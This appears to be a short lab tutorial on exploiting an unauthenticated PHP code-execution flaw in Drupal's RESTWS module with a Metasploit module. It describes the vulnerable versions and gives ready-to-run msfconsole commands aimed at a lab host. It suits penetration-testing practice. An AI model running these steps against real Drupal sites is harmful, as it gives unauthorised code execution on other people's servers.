Exploit Drupal using RESTWS Module Remote PHP Code Execution

This module exploits a Remote PHP Code Execution vulnerability in Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user. RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 versions are affected by issue. This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.

 Exploit Targets

RESTWS 2.x

Requirement

Attacker: kali Linux

Victim PC: drupal

Open Kali terminal type msfconsole

https://i2.wp.com/4.bp.blogspot.com/-kc88aX8OSt0/V5xAUxBwCII/AAAAAAAANC4/0aciITX4D6g84l4ie3ZTqQAD9mRDaV9YwCLcB/s1600/1.png?w=687&ssl=1

Now type use exploit/unix/webapp/drupal_restws_exec

msf exploit (drupal_restws_exec)>set targeturi /

msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)

msf exploit (drupal_restws_exec)>set rport 80

msf exploit (drupal_restws_exec)>exploit

https://i2.wp.com/2.bp.blogspot.com/-XtDIcXvC5WQ/V5xAXidZZxI/AAAAAAAANC8/9ppuuhTM9VIx4oX5YWSZfajCS2XjcOADACLcB/s1600/2.png?w=687&ssl=1

Leave a Reply

Your email address will not be published. Required fields are marked *